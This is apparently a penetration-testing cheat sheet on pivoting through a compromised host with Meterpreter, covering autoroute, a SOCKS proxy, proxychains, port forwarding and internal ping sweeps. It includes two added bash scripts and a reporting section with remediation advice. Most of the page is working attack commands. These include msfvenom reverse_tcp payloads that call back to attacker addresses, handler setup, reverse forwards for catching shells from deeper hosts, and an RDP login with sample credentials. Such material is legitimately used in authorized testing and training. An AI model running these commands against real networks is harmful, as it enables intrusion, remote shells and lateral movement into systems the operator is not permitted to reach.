🛡️ Methodology Checklist
- Gain a Meterpreter session on the pivot host
- Add a route to the internal subnet through that session:
  run post/multi/manage/autoroute SUBNET=[INTERNAL_NET] NETMASK=255.255.255.0
- Background the session and start the SOCKS proxy (the module runs as a background job; SRVHOST defaults to 0.0.0.0, so set it to 127.0.0.1 unless another host must use the proxy):
  use auxiliary/server/socks_proxy; set SRVPORT 1080; set VERSION 5; run
- Configure /etc/proxychains.conf with exactly one active entry under [ProxyList], matching the VERSION and SRVPORT above:
  socks5 127.0.0.1 1080
- Run tools through proxychains against internal targets (TCP connections only; nmap needs -sT -Pn)
- Single port forward when only one service is needed:
  portfwd add -l [LPORT] -p [RPORT] -r [INTERNAL_IP]
- Internal ARP scan (Windows Meterpreter sessions only):
  run post/windows/gather/arp_scanner RHOSTS=[SUBNET]
🎯 Operational Context
Use when: Active Meterpreter session on a dual-homed host — add routes and start SOCKS proxy to pivot into the internal network.
Think Dumber First: from the Meterpreter prompt, run post/multi/manage/autoroute SUBNET=[INTERNAL_NET], then background the session and use auxiliary/server/socks_proxy; set SRVPORT 1080; run. Two commands, done: every MSF module now reaches the internal subnet through the session, and any tool wrapped in proxychains reaches it through the SOCKS listener.
Skip when: the Meterpreter session is unstable. Establish a stable session first; every route and port forward hangs off that one session, so losing it drops all pivot access at once.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=[LHOST] LPORT=[LPORT] -f elf -o backupjob | Generate Linux pivot payload |
| run post/multi/gather/ping_sweep RHOSTS=[SUBNET]/23 | Meterpreter: ping sweep the internal subnet using the pivot's network stack |
| for i in {1..254}; do (ping -c 1 172.16.5.$i \| grep "bytes from" &); done | Linux bash ping sweep (from a shell on the pivot; covers one /24) |
| for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 \| find "Reply" | Windows CMD ping sweep |
| 1..254 \| % {"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.16.5.$($_) -quiet)"} | PowerShell ping sweep |
| use post/multi/manage/autoroute → set SESSION 1 → set SUBNET 172.16.5.0 → run | Add route to internal subnet through Meterpreter session (NETMASK defaults to 255.255.255.0) |
| run post/multi/manage/autoroute CMD=print (Meterpreter prompt) or route print (msfconsole) | Verify active routes |
| use auxiliary/server/socks_proxy → set SRVPORT 9050 → set VERSION 4a → run | Start SOCKS4a proxy in MSF for external tool tunneling (runs as a background job) |
| proxychains nmap 172.16.5.19 -p3389 -sT -v -Pn | Scan internal host via the MSF SOCKS tunnel (TCP connect scan, no host discovery) |
| meterpreter > portfwd add -l [LPORT] -p [TARGET_PORT] -r [INTERNAL_IP] | Local port forward (like ssh -L) |
| meterpreter > portfwd add -R -l [LPORT_ATTACKER] -p [PIVOT_LISTEN_PORT] -L [LHOST] | Reverse port forward (like ssh -R) |
| xfreerdp /v:localhost:[LPORT] /u:[USER] /p:[PASS] | Connect to the forwarded RDP port |
| meterpreter > portfwd flush | Remove all port forwarding rules |
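The bash loop in the cheatsheet covers a single /24 while the ping_sweep row targets a /23, so the two rows do not agree on scope. The script below is an added example and not part of the original page: it expands any CIDR into host addresses with plain shell arithmetic, sweeps them from a shell on the pivot with bounded parallelism, and adds a TCP connect probe for segments where ICMP is filtered (the same reason nmap needs -Pn through the SOCKS tunnel). The CIDRs, port and concurrency values are illustrative; it assumes a Linux pivot with bash, GNU xargs, coreutils timeout and iputils ping.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): CIDR-aware host discovery from a
# shell on a Linux pivot. Assumes bash, GNU xargs (-P), coreutils timeout and
# iputils ping (-W). Addresses and ports below are illustrative.

# ip2int 172.16.5.19 -> 2886731027 (octets written without leading zeros)
ip2int() {
    local a b c d
    IFS=. read -r a b c d <<<"$1"
    echo $(( (a << 24) | (b << 16) | (c << 8) | d ))
}

# int2ip 2886731027 -> 172.16.5.19
int2ip() {
    echo "$(( ($1 >> 24) & 255 )).$(( ($1 >> 16) & 255 )).$(( ($1 >> 8) & 255 )).$(( $1 & 255 ))"
}

# cidr_hosts 172.16.4.0/23 -> every usable host address, one per line
# (network and broadcast skipped). A /23 yields 172.16.4.1 .. 172.16.5.254,
# which a single {1..254} loop over the last octet would miss.
cidr_hosts() {
    local net=${1%/*} bits=${1#*/} base mask size i
    base=$(ip2int "$net")
    mask=$(( (0xFFFFFFFF << (32 - bits)) & 0xFFFFFFFF ))
    base=$(( base & mask ))          # normalise a host address to its network
    size=$(( 1 << (32 - bits) ))
    i=1
    while [ "$i" -lt $(( size - 1 )) ]; do
        int2ip $(( base + i ))
        i=$(( i + 1 ))
    done
}

# icmp_sweep CIDR [PARALLEL]: one echo request per host with a 1 s wait,
# PARALLEL probes in flight, responders printed in address order.
icmp_sweep() {
    local cidr=$1 par=${2:-64}
    cidr_hosts "$cidr" \
        | xargs -P "$par" -n 1 sh -c 'ping -c 1 -W 1 "$1" >/dev/null 2>&1 && echo "$1"' _ \
        | sort -t . -k1,1n -k2,2n -k3,3n -k4,4n
}

# tcp_probe IP PORT: connect() via bash's /dev/tcp with a 2 s timeout; exits 0
# when the port answers. For hosts that drop ICMP but run a known service.
tcp_probe() {
    timeout 2 bash -c "exec 3<>/dev/tcp/$1/$2" 2>/dev/null
}

# tcp_sweep CIDR PORT [PARALLEL]: TCP-only discovery for ICMP-filtered segments
tcp_sweep() {
    local cidr=$1 port=$2 par=${3:-64}
    export -f tcp_probe
    cidr_hosts "$cidr" \
        | xargs -P "$par" -I{} bash -c 'tcp_probe "$1" "$2" && echo "$1"' _ {} "$port" \
        | sort -t . -k1,1n -k2,2n -k3,3n -k4,4n
}

# Usage on the pivot:  ./sweep.sh icmp 172.16.4.0/23
#                      ./sweep.sh tcp  172.16.4.0/23 445
case "${1:-}" in
    icmp) icmp_sweep "$2" ;;
    tcp)  tcp_sweep "$2" "$3" ;;
esac
```

The sweep functions run only when invoked with a subcommand, so the file can also be sourced to reuse cidr_hosts for feeding other tools (for example, piping the list into a proxychains-wrapped scanner from the attack host).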
🔬 Deep Dive & Workflow
When to Use Meterpreter Pivoting
Use it when SSH credentials are unavailable, SSH is blocked, or you are already operating inside Metasploit and want to avoid context-switching to a separate tunnelling tool.
Full Workflow
Step 1: Compromise the pivot host
```
# Generate payload
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.18 LPORT=8080 -f elf -o backupjob
# Catch it
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 0.0.0.0; set lport 8080; run
```
Step 2: Internal recon
```
# From Meterpreter: uses the pivot's network stack, so no route is needed yet
run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23
# Alternative: drop to a shell and loop over the host's own ping binary
# (note: this loop covers only 172.16.5.0/24; the /23 above also includes 172.16.4.x)
meterpreter > shell
for i in {1..254}; do (ping -c 1 172.16.5.$i | grep "bytes from" &); done
```
Step 3: Add route + SOCKS proxy
```
# Tell MSF which subnet lives behind this session (from msfconsole, after backgrounding the session)
use post/multi/manage/autoroute
set SESSION 1
set SUBNET 172.16.5.0
run
route print    # verify; the same list via Meterpreter: run post/multi/manage/autoroute CMD=print
# Start SOCKS4a proxy (runs as a background job; check with jobs)
use auxiliary/server/socks_proxy
set SRVPORT 9050; set SRVHOST 0.0.0.0; set version 4a; run
# SRVHOST 0.0.0.0 exposes the proxy to anyone who can reach the attack host; use 127.0.0.1 unless another box needs it
# Configure proxychains: [ProxyList] must hold exactly one active entry. Kali's default file already ends with
# "socks4 127.0.0.1 9050" (intended for Tor), which happens to match this listener, so check before appending;
# with strict_chain every listed proxy becomes a hop, so a leftover or duplicated line breaks the path
echo "socks4 127.0.0.1 9050" >> /etc/proxychains.conf
```
Step 4: Tunnel tools
```
# -sT and -Pn are mandatory: SOCKS carries only complete TCP connections, so SYN scans, ICMP discovery and UDP never leave the attack host
proxychains nmap 172.16.5.19 -p3389 -sT -v -Pn
# Any other tool can be wrapped the same way, including a second msfconsole
proxychains msfconsole
```
portfwd: Direct Port Mapping
Local forward (access a remote service locally):
```
meterpreter > portfwd add -l 3300 -p 3389 -r 172.16.5.19
# Now connect from the attack host:
xfreerdp /v:localhost:3300 /u:victor /p:pass@123
```
Reverse forward (catch a shell from a deeper target):
```
# 1. Tell the pivot to listen on 1234 and forward that traffic to the attack host (10.10.14.18) on 8081
meterpreter > portfwd add -R -l 8081 -p 1234 -L 10.10.14.18
# 2. Generate a payload that calls back to the PIVOT's internal IP on 1234
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.5.129 LPORT=1234 -f exe -o backup.exe
# 3. Start the handler on the attack host (8081); the payload type must match the binary
use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST 0.0.0.0; set LPORT 8081; run
```
AutoRoute vs portfwd
| Feature | AutoRoute + SOCKS | portfwd |
|---|---|---|
| Use case | Scanning, multiple tools, Nmap | Specific app (RDP, web, shells) |
| Speed | Slower | Faster |
| Stability | Can break under heavy load | Generally stable |
Debug tip: If proxychains fails, check the route table first: route print in msfconsole, or run post/multi/manage/autoroute CMD=print at the Meterpreter prompt. A route that does not cover the target means the SOCKS proxy has nowhere to send the traffic and the connection simply fails. Then confirm the socks_proxy job is still running (jobs) and that the proxychains entry matches its SRVPORT and VERSION.
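Step 3 appends a line to /etc/proxychains.conf and the debug tip covers missing routes; the other common failure is the proxy list itself. The script below is an added example, not code from the original page or from Metasploit: it counts the active hops under [ProxyList], rewrites an existing file so only the MSF listener remains, generates a standalone config for proxychains4 -f, and checks that the SOCKS port is actually accepting connections before a tool is wrapped. The sample config is constructed to mirror the stock Kali layout; file paths, ports and the quiet_mode/proxy_dns choices are assumptions.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): manage the proxychains
# [ProxyList] for the Metasploit SOCKS listener. Kali ships strict_chain with a
# single "socks4 127.0.0.1 9050" Tor entry; every active line under [ProxyList]
# becomes a hop, so a stray or duplicated entry breaks the chain. Paths, ports
# and the sample file are assumptions for the demo.

# Constructed sample mirroring the stock layout (not a real capture)
SAMPLE_CONF='strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
# add proxy here ...
# defaults set to "tor"
socks4 	127.0.0.1 9050'

# socks_type VERSION -> proxychains keyword for the MSF VERSION option (4a|5)
socks_type() {
    case "$1" in
        4a) echo socks4 ;;
        5)  echo socks5 ;;
        *)  echo "VERSION must be 4a or 5, got '$1'" >&2; return 1 ;;
    esac
}

# active_proxies < conf -> the non-comment, non-blank lines under [ProxyList]
active_proxies() {
    awk '/^\[ProxyList\]/ { inlist = 1; next }
         inlist && $0 !~ /^[ \t]*(#|$)/ { print }'
}

# replace_proxylist VERSION [HOST] [PORT] < conf > fixed_conf
# Comments out every existing hop and appends the MSF listener, so the chain
# has exactly one hop regardless of what was there before.
replace_proxylist() {
    local type
    type=$(socks_type "$1") || return 1
    awk -v entry="$type ${2:-127.0.0.1} ${3:-1080}" '
        /^\[ProxyList\]/ { print; inlist = 1; next }
        inlist && $0 !~ /^[ \t]*(#|$)/ { print "# " $0; next }   # retire old hop
        { print }
        END { print entry }'
}

# msf_proxychains_conf VERSION [HOST] [PORT] > file: a standalone config for
# "proxychains4 -f file", leaving /etc/proxychains*.conf untouched. proxy_dns
# sends hostname lookups through the proxy; quiet_mode keeps nmap output clean.
msf_proxychains_conf() {
    local type
    type=$(socks_type "$1") || return 1
    printf '%s\n' strict_chain proxy_dns quiet_mode \
        'tcp_read_time_out 15000' 'tcp_connect_time_out 8000' \
        '[ProxyList]' "$type ${2:-127.0.0.1} ${3:-1080}"
}

# socks_listening HOST PORT: exits 0 if something accepts TCP on the proxy
# port (a stopped socks_proxy job fails the same way as a missing route).
socks_listening() {
    timeout 2 bash -c "exec 3<>/dev/tcp/$1/$2" 2>/dev/null
}

# Usage:  ./pc.sh 5 1080 > ~/msf.conf && proxychains4 -f ~/msf.conf nmap -sT -Pn -p3389 172.16.5.19
if [ $# -ge 2 ]; then
    socks_listening 127.0.0.1 "$2" \
        || echo "warning: nothing listening on 127.0.0.1:$2 (is the socks_proxy job running?)" >&2
    msf_proxychains_conf "$1" 127.0.0.1 "$2"
fi
```

Writing a dedicated config and passing it with -f keeps the engagement's settings separate from the system file, so a later Tor or Burp setup does not silently chain through the MSF listener or vice versa.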
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| autoroute fails | Session is a plain shell, not Meterpreter | Upgrade first: sessions -u [ID], or use post/multi/manage/shell_to_meterpreter |
| SOCKS proxy module fails to bind | Port 1080 already in use | set SRVPORT 1090 and change the proxychains.conf entry to match |
| Internal hosts unreachable via proxychains | No route covers the target subnet | route print (or run post/multi/manage/autoroute CMD=print) and add the missing subnet with SUBNET=[NET] NETMASK=[MASK] |
| MSF modules work but proxychains tools fail | Tool resolves internal hostnames locally, or [ProxyList] has a stale or duplicated hop | Target internal hosts by IP as in the examples; if names are required, enable proxy_dns and confirm resolution works before relying on it; keep exactly one entry that matches the MSF listener |
| Only one internal service is needed | Full SOCKS setup is more than the task needs | portfwd add -l [LPORT] -p [RPORT] -r [INTERNAL_IP] and connect to localhost:[LPORT] |
📝 Reporting Trigger
Finding Title: Meterpreter Autoroute Pivots Through Compromised Host to Internal Network
Impact: Meterpreter autoroute establishes transparent routing through the compromised host to internal network segments, enabling direct MSF module execution against previously unreachable internal systems without additional tools.
Root Cause: The compromised host acts as an unmonitored bridge between network segments. There is no behavioral detection of the Meterpreter SOCKS proxy or of route establishment.
Recommendation: Implement network segmentation that prevents dual-homed hosts from bridging security zones. Monitor for unusual inter-segment connections from management hosts. Deploy Meterpreter-specific EDR signatures.